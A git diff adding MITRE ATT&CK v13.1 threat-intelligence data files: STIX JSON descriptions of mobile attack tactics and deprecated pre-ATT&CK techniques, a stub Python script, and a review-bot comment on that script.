Adversaries' main constraints in network-level defense avoidance are testing and deployment of tools to rapidly change their protocols, awareness of existing defensive technologies, and access to legitimate Web services that, when used appropriately, make their tools difficult to distinguish from benign traffic.\n\nAdditionally, in the mobile environment, mobile devices are frequently connected to networks outside enterprise control such as cellular networks or public Wi-Fi networks. Adversaries could attempt to evade detection by communicating on these networks, and potentially even by using non-Internet Protocol mechanisms such as Short Message Service (SMS). However, cellular networks often have data caps and/or extra data charges that could increase the potential for adversarial communication to be detected.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "command-and-control" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756.json new file mode 100644 index 0000000000000000000000000000000000000000..6a9121e0b55586c4f9cceadf3a1e6c316a4c010d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--8231ef22-d43a-4a87-8a0f-ce4542ee34ab", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756", + "type": "x-mitre-tactic", + "created": "2020-01-27T14:00:49.089Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0041", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0041" + } + ], + "modified": "2020-01-27T14:00:49.089Z", + "name": "Execution", + "description": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a mobile device. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "execution" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e.json new file mode 100644 index 0000000000000000000000000000000000000000..0c94ca893f1a7b96228e7ee1e3c91e1569955b96 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--e9f56564-292a-4db4-9c7b-5ef26e84e012", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0034", + "url": "https://attack.mitre.org/tactics/TA0034", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T16:09:15.308Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your devices and data.\n\nThe impact tactic consists of techniques used by the adversary to execute his or her mission objectives but that do not cleanly fit into another category such as Collection. Mission objectives vary based on each adversary's goals, but examples include toll fraud, destruction of device data, or locking the user out of his or her device until a ransom is paid.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "impact" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10.json new file mode 100644 index 0000000000000000000000000000000000000000..4ec0d94a2cbbe7e974bea8e5848383a05b3ced73 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a6613e71-6917-4ebd-82a3-67089ca67edc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0031", + "url": "https://attack.mitre.org/tactics/TA0031", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:05:02.718Z", + "name": "Credential Access", + "description": "The adversary is trying to steal account names, passwords, or other secrets that enable access to resources.\n\nCredential access represents techniques that can be used by adversaries to obtain access to or control over passwords, tokens, cryptographic keys, or other values that could be used by an adversary to gain unauthorized access to resources. Credential access allows the adversary to assume the identity of an account, with all of that account's permissions on the system and network, and makes it harder for defenders to detect the adversary. With sufficient access within a network, an adversary can create accounts for later use within the environment.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "credential-access" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba.json new file mode 100644 index 0000000000000000000000000000000000000000..99c58e9efca9f9dff98b740d17b4fdaffe54b179 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--7e6bce62-7e05-4139-9243-e538cbe9c372", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0035", + "url": "https://attack.mitre.org/tactics/TA0035", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:10.915Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "collection" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f.json new file mode 100644 index 0000000000000000000000000000000000000000..6430906954fb076d196eec49a34b9749ad3553a3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--ae081da6-a00b-421b-94b0-d325ce3bb91c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0033", + "url": "https://attack.mitre.org/tactics/TA0033", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:05:37.854Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your environment.\n\nLateral movement consists of techniques that enable an adversary to access and control remote systems on a network and could, but does not necessarily, include execution of tools on remote systems. The lateral movement techniques could allow an adversary to gather information from a system without needing additional tools, such as a remote access tool.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "lateral-movement" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df.json new file mode 100644 index 0000000000000000000000000000000000000000..0f22757be8ab2aed614d4df96b6b3fd4ad601aad --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--4a021dda-0950-43dc-9570-b431b667e116", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0030", + "url": "https://attack.mitre.org/tactics/TA0030", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:04:46.497Z", + "name": "Defense Evasion", + "description": " The adversary is trying to avoid being detected.\n\nDefense evasion consists of techniques an adversary may use to evade detection or avoid other defenses. Sometimes these actions are the same as or variations of techniques in other categories that have the added benefit of subverting a particular defense or mitigation. Defense evasion may be considered a set of attributes the adversary applies to all other phases of the operation.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "defense-evasion" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210.json new file mode 100644 index 0000000000000000000000000000000000000000..487a24461c22927db2f78e36cf2e94657f575d1c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--81031e9d-fff8-4a4d-8910-f277a9bc8ff0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-07T21:01:17.781Z", + "name": "Network Effects", + "description": "The adversary is trying to intercept or manipulate network traffic to or from a device.\n\nThis category refers to network-based techniques that an adversary may be able to use to fulfill his or her objectives without access to the mobile device itself. These include techniques to intercept or manipulate network traffic to and from the mobile device.", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "network-effects", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0038", + "external_id": "TA0038" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1.json new file mode 100644 index 0000000000000000000000000000000000000000..648321ba6614b796aea0372ea387158abc776f0c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--40759d9d-4a98-4b9d-9e3b-65feb5311124", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0032", + "url": "https://attack.mitre.org/tactics/TA0032", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T16:09:00.466Z", + "name": "Discovery", + "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques that allow the adversary to gain knowledge about the characteristics of the mobile device and potentially other networked systems. When adversaries gain access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the intrusion. The operating system may provide capabilities that aid in this post-compromise information-gathering phase.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "discovery" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17.json b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17.json new file mode 100644 index 0000000000000000000000000000000000000000..99c150efa35cbe42547f0c53fdede7e687901170 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/x-mitre-tactic/x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17.json 
@@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--4d8dee21-bbff-49dd-a8d3-96a09a77cb5a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-11-07T21:01:36.112Z", + "name": "Remote Service Effects", + "description": "The adversary is trying to control or monitor the device using remote services.\n\nThis category refers to techniques involving remote services, such as vendor-provided cloud services (e.g. Google Drive, Google Find My Device, or Apple iCloud), or enterprise mobility management (EMM)/mobile device management (MDM) services that an adversary may be able to use to fulfill his or her objectives without access to the mobile device itself.", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "remote-service-effects", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0039", + "external_id": "TA0039" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/parse_data.py b/cti-ATT-CK-v13.1/parse_data.py new file mode 100644 index 0000000000000000000000000000000000000000..bdbe434f75833822535ec0af746769512b73c481 --- /dev/null +++ b/cti-ATT-CK-v13.1/parse_data.py @@ -0,0 +1 @@ +filename = "cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json" \ No newline at end of file 
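Review bot: The new `parse_data.py` only assigns `filename` and never opens or parses the file, so as committed the script is a no-op with a hard-coded path and no indication of intent. The path is also relative to the repository root (it starts with `cti-ATT-CK-v13.1/...` while the script itself lives inside that directory), so it resolves only when the script is run from the root; anchoring it to the script's own location, `filename = pathlib.Path(__file__).parent / "enterprise-attack" / "attack-pattern" / "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22.json"`, avoids that dependence on the working directory. A one-line module comment stating what the script is meant to extract from the STIX bundle would also help, since nothing here says why this single attack-pattern file was chosen. If parsing is added later, loading with `json.load` keeps the handling of the bundle data-only.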
diff --git a/cti-ATT-CK-v13.1/pre-attack/README.md b/cti-ATT-CK-v13.1/pre-attack/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..f4bc0f3747dda52ddb5e9cf1a9cd75c51dd36382
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/README.md
@@ -0,0 +1,3 @@
+# ⚠ pre-ATT&CK is deprecated
+
+As of ATT&CK version 8.0, the entire pre-ATT&CK domain has been [deprecated](https://github.com/mitre/cti/blob/master/USAGE.md#working-with-deprecated-and-revoked-objects) in favor of two new tactics in the Enterprise domain tagged with the `PRE` platform. Please see the new [PRE matrix](https://attack.mitre.org/matrices/enterprise/PRE/) for the replacing Enterprise tactics and techniques. All objects within the pre-ATT&CK domain have been marked as deprecated, along with a new description pointing to their new home in Enterprise.
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88.json
new file mode 100644
index 0000000000000000000000000000000000000000..f6c17493f9a9998136bff9e78dd75114cf0e903b
--- /dev/null
+++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88.json
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--26bef19b-a15a-4914-9edf-b8c7b72b00b9", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1277).\n\nData sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1277", + "external_id": "T1277" + }, + { + "source_name": "SANSThreatProfile", + "description": "Stephen Irwin. (2014, September 8). Creating a Threat Profile for Your Organization. Retrieved March 5, 2017." + }, + { + "source_name": "Infosec-osint", + "description": "InfoSec Institute. (2013, September 11). OSINT (Open-Source Intelligence). Retrieved May 9, 2017." + }, + { + "source_name": "isight-osint", + "description": "Dawn Lomer. (2017). 101+ OSINT Resources for Investigators. Retrieved May 9, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1054", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400.json new file mode 100644 index 0000000000000000000000000000000000000000..6a3c714bad3a62d2cc8245ff6a9f171391868c3d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--f321f2f5-8107-45c0-aacd-8d447d00bf1c", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--03da0598-ed46-4a73-bf43-0313b3522400", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Submit KITs, KIQs, and intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1237).\n\nOnce they have been created, intelligence requirements, Key Intelligence Topics (KITs), and Key Intelligence Questions (KIQs) are submitted into a central management system. (Citation: ICD204) (Citation: KIT-Herring)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1237", + "external_id": "T1237" + }, + { + "source_name": "ICD204", + "description": "Office of the Director of National Intelligence. (2015, January 02). Retrieved March 5, 2017." + }, + { + "source_name": "KIT-Herring", + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved May 19, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. 
May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1014", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983.json new file mode 100644 index 0000000000000000000000000000000000000000..95e6a5af400e1ef8ca249151365d9c49e4003b34 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--fd34a9f5-e537-4781-a305-1c7efb63c6c6", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--03f4a766-7a21-4b5e-9ccf-e0cf422ab983", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire or compromise 3rd party signing certificates", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1332).\n\nCode signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1332", + "external_id": "T1332" + }, + { + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. 
Retrieved March 6, 2017.", + "source_name": "DiginotarCompromise", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1109", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "It is trivial to purchase code signing certificates within an organization; many exist and are available at reasonable cost. It is complex to factor or steal 3rd party code signing certificates for use in malicious mechanisms", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not know what certificates an adversary acquires from a 3rd party. Defender will not know prior to public disclosure if a 3rd party has had their certificate compromised.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa.json new file mode 100644 index 0000000000000000000000000000000000000000..bcaa25a7efbdf6c3e6ce25b36237e48776c342ee --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--bfd1e876-c988-40c3-b653-3c82858c17b7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--0440f60f-9056-4791-a740-8eae96eb61fa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Authorized user performs requested cyber action", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nClicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1386", + "url": "https://attack.mitre.org/techniques/T1386" + }, + { + "source_name": "AnonHBGary", + "description": "Bright, P. (2011, February 15). Anonymous speaks: the inside story of the HBGary hack. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-10-14T01:53:27.989Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1163", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Users unwittingly click on spearphishing links frequently, despite training designed to educate about the perils of spearphishing.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Some environments have anti-spearphishing mechanisms to detect or block the link before it reaches the user.", + "x_mitre_deprecated": true, + 
